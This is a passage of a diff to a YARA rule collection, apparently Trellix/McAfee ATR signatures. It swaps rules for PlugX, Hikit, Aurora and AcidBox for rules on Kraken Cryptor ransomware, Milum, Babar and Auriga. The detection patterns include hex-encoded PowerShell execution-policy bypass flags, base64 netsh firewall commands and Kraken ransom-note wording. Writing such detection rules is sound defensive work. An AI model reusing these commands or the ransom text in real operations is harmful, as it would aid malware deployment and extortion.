+		$artifact6 = {5b 50 61 72 61 6d 65 74 65 72 28 50 6f 73 69 74 69 6f 6e 20 3d 20 31 20 2c 20 4d 61 6e 64 61 74 6f 72 79}
+		$artifact7 = {2d 45 78 65 63 75 74 69 6f 6e 50 6f 6c 69 63 79 20 42 79 50 61 73 73 20 2d 4e 6f 4c 6f 67 6f 20 2d 4e 6f 6e 49 6e 74 65 72 61 63 74 69 76 65 20 2d 4e 6f 50 72 6f 66 69 6c 65 20 2d 4e 6f 45 78 69 74}
+		$artifact8 = {72 65 74 75 72 6e 20 5b 42 69 74 43 6f 6e 76 65 72 74 65 72 5d 3a 3a 54 6f 49 6e 74 36 34}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "169e02f00c6fb64587297444b6c41ff4" and all of them )
+		6 of ( $api* ) or ( ( 3 of ( $artifact* ) ) )
 }
-
-rule TRELLIX_ARC_Sfx_Winrar_Plugx : BUILDER FILE
+rule TRELLIX_ARC_Kraken_Cryptor_Ransomware_Loader : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect the SFX WinRAR delivering a possible Plugx sample"
+		description = "Rule to detect the Kraken Cryptor Ransomware loader"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "ac975a58-6a8a-515e-b27f-327a7bfc7686"
-		date = "2019-06-25"
+		id = "e6bfa30b-6565-5d03-8f4d-96fc2b6a1c11"
+		date = "2018-09-30"
 		modified = "2020-08-14"
-		reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Operation_SoftCell.yar#L260-L307"
+		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Kraken.yar#L1-L30"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "8231f46330762cecf8a796d1a29c8fa6ba1c10b527fa86bf6c73130349558dad"
+		hash = "564154a2e3647318ca40a5ffa68d06b1bd40b606cae1d15985e3d15097b512cd"
+		logic_hash = "9e252a3ba7f6bf861ea7563461a1420959dfb0f5b7c3f6071150d03422504539"
 		score = 75
-		quality = 68
-		tags = "BUILDER, FILE"
+		quality = 70
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "builder"
-		malware_family = "Builder:W32/Plugx"
-		actor_type = "Apt"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Kraken"
+		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "Cannot create folder %sDCRC failed in the encrypted file %s. Corrupt file or wrong password." fullword wide
-		$s2 = "Wrong password for %s5Write error in the file %s. Probably the disk is full" fullword wide
-		$s3 = "mcutil.dll" fullword ascii
-		$s4 = "Unexpected end of archiveThe file \"%s\" header is corrupt%The archive comment header is corrupt" fullword wide
-		$s5 = "mcoemcpy.exe" fullword ascii
-		$s6 = "Extracting files to %s folder$Extracting files to temporary folder" fullword wide
-		$s7 = "&Enter password for the encrypted file:" fullword wide
-		$s8 = "start \"\" \"%CD%\\mcoemcpy.exe\"" fullword ascii
-		$s9 = "setup.bat" fullword ascii
-		$s10 = "ErroraErrors encountered while performing the operation" fullword wide
-		$s11 = "Please download a fresh copy and retry the installation" fullword wide
-		$s12 = "antivir.dat" fullword ascii
-		$s13 = "The required volume is absent2The archive is either in unknown format or damaged" fullword wide
-		$s14 = "=Total path and file name length must not exceed %d characters" fullword wide
-		$s15 = "Please close all applications, reboot Windows and restart this installation\\Some installation files are corrupt." fullword wide
-		$s16 = "folder is not accessiblelSome files could not be created." fullword wide
-		$s17 = "Packed data CRC failed in %s" fullword wide
-		$s18 = "DDTTDTTDTTDTTDTTDTTDTTDTTDTQ" fullword ascii
-		$s19 = "File close error" fullword wide
-		$s20 = "CRC failed in %s" fullword wide
-		$op0 = { e8 6f 12 00 00 84 c0 74 04 32 c0 eb 34 56 ff 75 }
-		$op1 = { 53 68 b0 34 41 00 57 e8 61 44 00 00 57 e8 31 44 }
-		$op2 = { 56 ff 75 08 8d b5 f4 ef ff ff e8 17 ff ff ff 8d }
+		$pdb = "C:\\Users\\Krypton\\source\\repos\\UAC\\UAC\\obj\\Release\\UAC.pdb" fullword ascii
+		$s2 = "SOFTWARE\\Classes\\mscfile\\shell\\open\\command" fullword wide
+		$s3 = "public_key" fullword ascii
+		$s4 = "KRAKEN DECRYPTOR" ascii
+		$s5 = "UNIQUE KEY" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "dbb1eb5c3476069287a73206929932fd" and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and $pdb or all of ( $s* )
 }
-rule TRELLIX_ARC_Apt_Hikit_Rootkit : ROOTKIT FILE
+rule TRELLIX_ARC_Kraken_Cryptor_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect the rootkit hikit based on PDB"
+		description = "Rule to detect the Kraken Cryptor Ransomware"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "c53acbc6-8f4a-590b-8dd7-ce4da6d79cf8"
-		date = "2012-08-20"
+		id = "7e1e5fa8-6d87-5e64-a8d4-4dae55ab76ca"
+		date = "2018-09-30"
 		modified = "2020-08-14"
-		reference = "https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_hikit_rootkit_pdb.yar#L1-L28"
+		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Kraken.yar#L32-L64"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "8a425ababdfbe95bd8ac7d4f519be16c0f1fd0b7eea2874124db2f00dd6eb56d"
+		hash = "564154a2e3647318ca40a5ffa68d06b1bd40b606cae1d15985e3d15097b512cd"
+		logic_hash = "2ad7f0bf6110eab79e0f9541c49ae44089ebca3f91ffa80de874d60d5a7ed266"
 		score = 75
 		quality = 70
-		tags = "ROOTKIT, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "rootkit"
-		malware_family = "Rootkit:W32/Hikit"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Kraken"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pdb = "\\JmVodServer\\hikit\\bin32\\RServer.pdb"
-		$pdb1 = "\\JmVodServer\\hikit\\bin32\\w7fw.pdb"
-		$pdb2 = "\\JmVodServer\\hikit\\bin32\\w7fw_2k.pdb"
-		$pdb3 = "\\JmVodServer\\hikit\\bin64\\w7fw_x64.pdb"
+		$s1 = "Kraken Cryptor" fullword ascii nocase
+		$s2 = "support_email" fullword ascii
+		$fw1 = "L0MgbmV0c2ggYWR2ZmlyZXdhbGwgZmlyZXdhbGwgYWRkIHJ1bGUgbmFtZT0iU01CIFByb3RvY29sIEJsb2NrIiBwcm90b2NvbD1UQ1AgZGlyPWluIGxvY2FscG9ydD00" ascii
+		$fw2 = "L0MgbmV0c2ggYWR2ZmlyZXdhbGwgZmlyZXdhbGwgYWRkIHJ1bGUgbmFtZT0iUkRQIFByb3RvY29sIEJsb2NrIiBwcm90b2NvbD1UQ1AgZGlyPWluIGxvY2FscG9ydD0z" ascii
+		$fw3 = "L0MgbmV0c2ggYWR2ZmlyZXdhbGwgZmlyZXdhbGwgYWRkIHJ1bGUgbmFtZT0iUkRQIFByb3RvY29sIEJsb2NrIiBwcm90b2NvbD1UQ1AgZGlyPWluIGxvY2FscG9ydD0z" ascii
+		$fw4 = "L0MgbmV0c2ggYWR2ZmlyZXdhbGwgZmlyZXdhbGwgYWRkIHJ1bGUgbmFtZT0iU01CIFByb3RvY29sIEJsb2NrIiBwcm90b2NvbD1UQ1AgZGlyPWluIGxvY2FscG9ydD00" ascii
+		$uac = "<!--<requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\" />-->   " fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and all of ( $fw* ) or all of ( $s* ) or $uac
 }
-rule TRELLIX_ARC_Apt_Aurora_Pdb_Samples : BACKDOOR FILE
+rule TRELLIX_ARC_Ransom_Note_Kraken_Cryptor_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Aurora APT Malware 2006-2010"
+		description = "Rule to detect the ransom note delivered by Kraken Cryptor Ransomware"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "51b080b7-671b-592b-ba52-7fdd0ddf0294"
-		date = "2010-01-11"
+		id = "dec9d364-daf9-5a1d-8e72-ed4dd2aeecdf"
+		date = "2018-09-30"
 		modified = "2020-08-14"
-		reference = "https://en.wikipedia.org/wiki/Operation_Aurora"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_operation_aurora.yar#L1-L26"
+		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Kraken.yar#L66-L108"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "ce7debbcf1ca3a390083fe5753f231e632017ca041dfa662ad56095a500f2364"
-		logic_hash = "5791ae7b96f2b59d0cca1ab97455bb4745edad8980ac4aff22aa36e0bc4f240e"
+		logic_hash = "d4acdf0716320b0f757b8dbc97bb9d407460b2d69dc8e12292539e823be0f57d"
 		score = 75
 		quality = 70
-		tags = "BACKDOOR, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Aurora"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Kraken"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pdb = "\\AuroraVNC\\VedioDriver\\Release\\VedioDriver.pdb"
-		$pdb1 = "\\Aurora_Src\\AuroraVNC\\Avc\\Release\\AVC.pdb"
+		$s1 = "No way to recovery your files without \"KRAKEN DECRYPTOR\" software and your computer \"UNIQUE KEY\"!" fullword ascii
+		$s2 = "Are you want to decrypt all of your encrypted files? If yes! You need to pay for decryption service to us!" fullword ascii
+		$s3 = "The speed, power and complexity of this encryption have been high and if you are now viewing this guide." fullword ascii
+		$s4 = "Project \"KRAKEN CRYPTOR\" doesn't damage any of your files, this action is reversible if you follow the instructions above." fullword ascii
+		$s5 = "https://localBitcoins.com" fullword ascii
+		$s6 = "For the decryption service, we also need your \"KRAKEN ENCRYPTED UNIQUE KEY\" you can see this in the top!" fullword ascii
+		$s7 = "-----BEGIN KRAKEN ENCRYPTED UNIQUE KEY----- " fullword ascii
+		$s8 = "All your files has been encrypted by \"KRAKEN CRYPTOR\"." fullword ascii
+		$s9 = "It means that \"KRAKEN CRYPTOR\" immediately removed form your system!" fullword ascii
+		$s10 = "After your payment made, all of your encrypted files has been decrypted." fullword ascii
+		$s11 = "Don't delete .XKHVE files! there are not virus and are your files, but encrypted!" fullword ascii
+		$s12 = "You can decrypt one of your encrypted smaller file for free in the first contact with us." fullword ascii
+		$s13 = "You must register on this site and click \"BUY Bitcoins\" then choose your country to find sellers and their prices." fullword ascii
+		$s14 = "-----END KRAKEN ENCRYPTED UNIQUE KEY-----" fullword ascii
+		$s15 = "DON'T MODIFY \"KRAKEN ENCRYPT UNIQUE KEY\"." fullword ascii
+		$s16 = "# Read the following instructions carefully to decrypt your files." fullword ascii
+		$s17 = "We use best and easy way to communications. It's email support, you can see our emails below." fullword ascii
+		$s18 = "DON'T USE THIRD PARTY, PUBLIC TOOLS/SOFTWARE TO DECRYPT YOUR FILES, THIS CAUSE DAMAGE YOUR FILES PERMANENTLY." fullword ascii
+		$s19 = "https://en.wikipedia.org/wiki/Bitcoin" fullword ascii
+		$s20 = "Please send your message with same subject to both address." fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 150KB and any of them
+		uint16( 0 ) == 0x4120 and filesize < 9KB and all of them
 }
-rule TRELLIX_ARC_APT_Acidbox_Kernelmode_Module : KERNELDRIVER FILE
+
+rule TRELLIX_ARC_Milum_Trojan : TROJAN FILE
 {
 	meta:
-		description = "Rule to detect the kernel mode component of AcidBox"
+		description = "Rule to detect Milum trojan from the Wildpressure operation"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "80b60307-5431-5f21-9e6f-06adaab0519d"
-		date = "2020-07-24"
+		id = "acc56237-a93a-55c0-a90c-11ca1da683db"
+		date = "2020-04-24"
 		modified = "2020-08-14"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_acidbox.yar#L1-L32"
+		reference = "https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_milum_wildpressure.yar#L3-L28"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "e39da89d0da22115ac7889bc73ff183973a6c5334e304df955362bde76694d42"
+		hash = "86456ebf6b807e8253faf1262e7a2b673131c80174f6133b253b2e5f0da442a9"
+		logic_hash = "3ab1ff129517cb4a829edac289c00d7701d6f667ba2ef5a28024fd01a3a52e8e"
 		score = 75
 		quality = 70
-		tags = "KERNELDRIVER, FILE"
+		tags = "TROJAN, FILE"
 		rule_version = "v1"
-		malware_type = "kerneldriver"
-		malware_family = "Rootkit:W32/Acidbox"
-		actor_type = "APT"
-		actor_group = "Turla"
-		hash1 = "3ef071e0327e7014dd374d96bed023e6c434df6f98cce88a1e7335a667f6749d"
+		malware_type = "trojan"
+		malware_family = "Trojan:W32/Milum"
+		actor_type = "Apt"
+		actor_group = "Unknown"
 
 	strings:
-		$pattern_0 = { 897c2434 8978b8 8d5f28 448bc3 33d2 }
-		$pattern_1 = { 4c8d842470010000 488d942418010000 498bcf e8???????? 8bd8 89442460 }
-		$pattern_2 = { 4c8bf1 49d1eb 4585c9 0f88a2000000 440fb717 498bd0 }
-		$pattern_3 = { ff15???????? 4c8d9c2480000000 498b5b10 498b7318 498b7b20 4d8b7328 498be3 }
-		$pattern_4 = { 33d2 41b8???????? 895c2420 e8???????? }
-		$pattern_5 = { 895c2420 4885ff 0f8424010000 440f20c0 84c0 0f8518010000 }
-		$pattern_6 = { 85f6 0f8469fdffff 488d8424c8010000 41b9???????? }
-		$pattern_7 = { 894c2404 750a ffc7 893c24 41ffc3 ebcb 85c9 }
-		$pattern_8 = { 488b5c2450 488b742458 488b7c2460 4883c430 }
-		$pattern_9 = { 33d2 488b4c2428 e8???????? 448b842450040000 4503c0 4c8d8c2450040000 488bd7 }
+		$pattern = { 558B??6A??68????????64??????????5081??????????A1????????33??89????535657508D????64??????????8B????89??????????C7????????????8D????C7??????????33??6A??89??????????89????E8????????83????3B??0F84????????89????89??8B????89????8B????89????8B????C6??????8B????C6??????C6??????8B??????????BE????????89????89????88????C6??????6A??68????????8D??????????89??????????89??????????88??????????E8????????C6??????6A??538D????528D??????????89??????????89??????????88??????????E8????????C6??????8D??????????508B??E8????????508D??????????5157E8????????C6??????83????????????72??8B??????????52E8????????83????89??????????89??????????88??????????C6??????83????????????72??8B??????????50E8????????83????6A??68????????8D????89??????????89??????????88??????????89????89????88????E8????????C6??????6A??538D????518D????89????89????88????E8????????C6??????8D????528B??E8????????508D??????????5057E8????????C6??????83??????72??8B????51E8????????83????89????89????88????C6??????83??????72??8B????52E8????????83????6A??68????????8D????89????89????88????89????89????88????E8????????C6??????6A??538D????508D????89????89????88????E8????????C6??????83????8B??89??????????6A??89????89????68????????88??E8????????C6??????83????8B??89??????????6A??538D????89????89????5288??E8????????C6??????8D??????????50C6??????E8????????83????C6??????8B??????????2B??????????B8????????F7??03??C1????8B??C1????03??83????75??8B??????????6A??53528D????E8????????8B??????????6A??83????53508D????E8????????6A??538D????508D????89????89????88????E8????????C6??????6A??538D????518D????89????89????88????E8????????C6??????8D????528B??E8????????508D??????????5057E8????????C6??????BF????????39????72??8B????51E8????????83????89????89????88????C6??????39????72??8B????52E8????????83????89????89????88????C6??????8B??????????3B??74??8B??????????E8????????8B??????????50E8????????83????BF????????89??????????89??????????89??????????C6??????39????72??8B????51E8????????83????89????89????88????C6??????39????72??8B????52E8????????83????89????89????88????C6??????39????72??8B????50E8????????83????89????89????88????88????39????72??8B????51E8????????83????89????89????88????C7????????????39????72??8B????52E8????????83????8B??????????89????89????88????8B????64????????????595F5E5B8B????33??E8????????8B??5DC2????8D??????????508D??????????89??????????E8????????C6??????C7??????????????????C6??????68????????8D??????????51E8????????CCCC558B??6A??68????????64??????????5051535657A1????????33??508D????64??????????8B????C7??????????C7????????????8D????33??83??????89????72??8B??EB??8B??8D????88??8B????8B????518B??E8????????8B????89????8B????89??8B????89????89????88????83??????72??8B??50E8????????83????89????C7????????????88??83????89????89????C7????????????8B????8B??50518D????E8????????89????8B????52E8????????83????8B????64????????????595F5E5B8B??5DC2????CCCCCCCCCCCCCCCCCCCCCCCCCC558B??6A??68????????64??????????505156A1????????33??508D????64??????????83????C7????????????8B????5156E8????????C7????????????C7????????????8B??8B????64????????????595E8B??5DC2????CCCCCCCCCCCC558B??6A??68????????64??????????5081??????????A1????????33??89????535657508D????64??????????8B????33??8B??89??????????8B????8B??89??????????89??????????89??????????3B??0F84????????8D????39??????????0F85????????68????????8D????5750E8????????C7????????????83????8D????57518B??E8????????83????C6??????8B??????????6A??535083????E8????????C6??????BF????????39????72??8B????52E8????????83????C7????????????89????88????88????39????72??8B????50E8????????83????C7????????????89????88????E9????????578D????68????????51E8????????C7????????????508D??????????52BA????????E8????????C6??????83????8D????57518B??E8????????83????C6??????8B??????????6A??535083????E8????????C6??????BF????????39????72??8B????52E8????????83????C7????????????89????88????C6??????39??????????72??8B??????????50E8????????83????C7??????????????????89??????????88??????????88????39????72??8B????51E8????????83????C7????????????89????88????FF??????????38????75??8B????38????75??8B??8B??38????75??8D????8B??8B??38????74??EB??8B????38????75??3B????75??8B??8B????38????74??8B??8B??????????3B????0F85????????8B??????????8B??6A??5383????C7????????????89????508B??88??E8????????89????C7??????????????????8B??8B????64????????????595F5E5B8B????33??E8????????8B??5DC2????CCCCCCCCCCCCCCCCCCCCCCCCCCCC558B??6A??68????????64??????????50515356A1????????33??508D????64??????????8B??89????C7??????????33??89????83??????72??8B????50E8????????83????C7????????????89????88????C7????????????83??????72??8B????50E8????????83????C7????????????89????88????8B????64????????????595E5B8B??5DC3CCCCCCCCCC558B??6A??68????????64??????????5083????A1????????33??89????5356508D????64??????????33??89????538B??68????????8D????89????C7????????????89????88????E8????????C7????????????6A??8D????38????74??68????????EB??68????????E8????????8D????5083????8D????5651E8????????C6??????8D????52578B??E8????????83????C7????????????C6??????BE????????39????72??8B????50E8????????83????C7????????????89????88????88????39????72??8B????51E8????????83????C7????????????89????88????8B??8B????64????????????595E5B8B????33??E8????????8B??5DC3CCCCCCCCCCCCCCCCCCCCCCCCCCCCCC558B??6A??68????????64??????????50515356A1????????33??508D????64??????????8B??89????C7??????????33??89????83??????72??8B????50E8????????83????C7????????????89????88????C7????????????83??????72??8B????50E8????????83????F6??????C7????????????89????88????74??56E8????????83????8B??8B????64????????????595E5B8B??5DC2????CCCC558B??6A??68????????64??????????50A1????????33??508D????64??????????C7????????????6A??6A??8D????5083????E8????????C7????????????83??????72??8B????51E8????????83????C7????????????C7????????????C6??????8B????64????????????598B??5DC2????CCCCCCCCCCCCCCCCCCCCCC558B??6A??68????????64??????????5083????A1????????33??89????535657508D????64??????????33??89????8B????89????89????B8????????89????C7????????????89????88??89????8D????BF????????39????72??8B??8B????39????73??8D????8B????518D????518B??E8????????C6??????508B??E8????????C6??????39????72??8B????52E8????????83????C7????????????89????88????88????39????72??8B????50E8????????83????C7????????????89????88????8B??8B????64????????????595F5E5B8B????33??E8????????8B??5DC2????CCCCCCCCCCCCCCCC558B??6A??68????????64??????????5081??????????A1????????33??89????535657508D????64??????????8B??33??89????8B????89??????????89?????????? }
 
 	condition:
-		7 of them and filesize < 78848
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and pe.imphash ( ) == "548d9f5f1e74f34b85612667335d41f2" and all of them
 }
-rule TRELLIX_ARC_APT_Acidbox_Main_Module_Dll : BACKDOOR FILE
+rule TRELLIX_ARC_Apt_Babar_Malware : BACKDOOR FILE
 {
 	meta:
-		description = "Rule to detect the Main mode component of AcidBox"
+		description = "Rule to detect Babar malware"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "8c9beb0f-62f7-5788-8340-0b1ecdf54253"
-		date = "2020-07-24"
+		id = "3cbb63ce-ff93-51ee-93aa-2594fa1f8dad"
+		date = "2015-02-18"
 		modified = "2020-08-14"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_acidbox.yar#L34-L65"
+		reference = "http://motherboard.vice.com/read/meet-babar-a-new-malware-almost-certainly-created-by-france"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_babar_pdb.yar#L1-L35"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "db98e204742b8629074d47df301ffcbb2dfb977a4da91557fb50838aae79e777"
+		hash = "c72a055b677cd9e5e2b2dcbba520425d023d906e6ee609b79c643d9034938ebf"
+		logic_hash = "02acef92691caed4573b609c111302427b9c27c5ef93f9199c52d75cb13e8615"
 		score = 75
-		quality = 70
+		quality = 45
 		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
 		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Acidbox"
-		actor_type = "APT"
-		actor_group = "Turla"
-		hash1 = "eb30a1822bd6f503f8151cb04bfd315a62fa67dbfe1f573e6fcfd74636ecedd5"
+		malware_family = "Backdoor:W32/Babar"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
 
 	strings:
-		$pattern_0 = { 7707 b8022d03a0 eb05 e8???????? }
-		$pattern_1 = { 4403c8 8bc3 41d1c6 33c6 81c6d6c162ca c1cb02 33c7 }
-		$pattern_2 = { e9???????? 412b5c2418 8b45dc 412b442408 41015c241c 410144240c 015f1c }
-		$pattern_3 = { 48895c2408 57 4883ec30 488bfa 33db 4885c9 7479 }
-		$pattern_4 = { 48895c2408 57 4883ec30 498bd8 488bfa 488364245800 85c9 }
-		$pattern_5 = { 488987e0010000 e9???????? 81cb001003a0 e9???????? 488b87a0010000 44847806 742e }
-		$pattern_6 = { 4d8bcc 4c8d0596c50100 498bd4 488bce e8???????? 498b9de0010000 c74605aa993355 }
-		$pattern_7 = { 4533c0 8d5608 e8???????? 488bf0 4889442460 4885c0 750b }
-		$pattern_8 = { 488d5558 41c1ee08 41b802000000 44887559 e8???????? 4c8b4de0 894718 }
-		$pattern_9 = { 4d03c2 4d3bc2 4d13cc 4d0303 4d3b03 4d8903 4c8b13 }
+		$s1 = "c:\\Documents and Settings\\admin\\Desktop\\Babar64\\Babar64\\obj\\DllWrapper Release\\Release.pdb" fullword ascii
+		$s2 = "%COMMON_APPDATA%" fullword ascii
+		$s3 = "%%WINDIR%%\\%s\\%s" fullword ascii
+		$s4 = "/s /n %s \"%s\"" fullword ascii
+		$s5 = "/c start /wait " fullword ascii
+		$s6 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\" fullword ascii
+		$s7 = "constructor or from DllMain." fullword ascii
+		$s8 = "ComSpec" fullword ascii
+		$s9 = "APPDATA" fullword ascii
+		$s10 = "WINDIR" fullword ascii
+		$s11 = "USERPROFILE" fullword ascii
 
 	condition:
-		7 of them and filesize < 550912
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
 }
-rule TRELLIX_ARC_APT_Acidbox_Ssp_Dll_Module : BACKDOOR FILE
+rule TRELLIX_ARC_Apt_Auriga_Driver : KERNELDRIVER FILE
 {
 	meta:
-		description = "Rule to detect the SSP DLL component of AcidBox"
+		description = "Rule to detect the Auriga driver"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "ef1511c5-f650-5e65-937c-466f00932183"
-		date = "2020-07-24"
+		id = "b61058a1-1b48-5be1-ba2f-74a7c3d38825"
+		date = "2013-03-13"
 		modified = "2020-08-14"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_acidbox.yar#L67-L98"
+		reference = "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_auriga_biscuit.yar#L1-L39"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "4c9b9de11d73587ca1ad1efa5455598e41edc5a9a59fc0339c429a212c1c7941"
+		hash = "207eee627a76449ac6d2ca43338d28087c8b184e7b7b50fdc60a11950c8283ec"
+		logic_hash = "c027073ba398fe89d418be67f0850c8d9e4d4c50a991c45b84cdb416497ccf1c"
 		score = 75
 		quality = 70
-		tags = "BACKDOOR, FILE"
+		tags = "KERNELDRIVER, FILE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Acidbox"
+		malware_type = "kerneldriver"
+		malware_family = "Driver:W32/Auriga"
 		actor_type = "APT"
-		actor_group = "Turla"
-		hash1 = "003669761229d3e1db0f5a5b333ef62b3dffcc8e27c821ce9018362e0a2df7e9"
+		actor_group = "APT1"
 
 	strings:
-		$pattern_0 = { 49897ba0 8bc7 49894398 49897ba8 33c9 49894bb0 }
-		$pattern_1 = { 8b8424a8000000 c1e818 88443108 66895c310a 498b0e }
-		$pattern_2 = { 8b5f48 413bdd 410f47dd 85db 0f84f1000000 488b4720 4885c0 }
-		$pattern_3 = { e8???????? 85c0 78c7 488d9424a0020000 488d8c24e0030000 ff15???????? 4c8bf8 }
-		$pattern_4 = { ff15???????? 488bc8 4c8bc6 33d2 ff15???????? 8bfb 895c2420 }
-		$pattern_5 = { 415f c3 4c8bdc 49895b10 }
-		$pattern_6 = { 488d842488010000 4889442420 41bf???????? 458bcf 4c8bc7 418bd7 488d8c2490000000 }
-		$pattern_7 = { c1e908 0fb6c9 3bce 77b6 8bd0 b9???????? c1ea10 }
-		$pattern_8 = { 4c8bc3 ba???????? 488d4c2438 e8???????? 89442430 85c0 7508 }
-		$pattern_9 = { bb02160480 8bc3 488b5c2440 488b742448 488b7c2450 4883c430 }
+		$s1 = "\\SystemRoot\\System32\\netui.dll" fullword wide
+		$s2 = "\\SystemRoot\\System32\\drivers\\riodrv32.sys" fullword wide
+		$s3 = "\\SystemRoot\\System32\\arp.exe" fullword wide
+		$s4 = "netui.dll" fullword ascii
+		$s5 = "riodrv32.sys" fullword wide
+		$s6 = "\\netui.dll" fullword wide
+		$s7 = "d:\\drizt\\projects\\auriga\\branches\\stone_~1\\server\\exe\\i386\\riodrv32.pdb" fullword ascii
+		$s8 = "\\riodrv32.sys" fullword wide
+		$s9 = "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\riodrv32" fullword wide
+		$s10 = "\\DosDevices\\rio32drv" fullword wide
+		$s11 = "e\\Driver\\nsiproxy" fullword wide
+		$s12 = "(C) S3/Diamond Multimedia Systems. All rights reserved." fullword wide
+		$s13 = "\\Device\\rio32drv" fullword wide
+		$s14 = "\\Registry\\Machine\\SOFTWARE\\riodrv" fullword wide
+		$s15 = "\\Registry\\Machine\\SOFTWARE\\riodrv32" fullword wide
 
 	condition:
-		7 of them and filesize < 199680
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them
 }
 rule TRELLIX_ARC_Troy_Malware_Campaign_Pdb : BACKDOOR FILE
 {
@@ -144934,34 +145141,6 @@ rule TRELLIX_ARC_Troy_Malware_Campaign_Pdb : BACKDOOR FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and filesize < 500KB and any of them
 }
-rule TRELLIX_ARC_Apt_Turla_Pdb : BACKDOOR FILE
-{
-	meta:
-		description = "Rule to detect a component of the APT Turla"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "b39ac7fc-16dd-559e-8ab0-76da5cbbc719"
-		date = "2017-05-31"
-		modified = "2020-08-14"
-		reference = "https://attack.mitre.org/groups/G0010/"
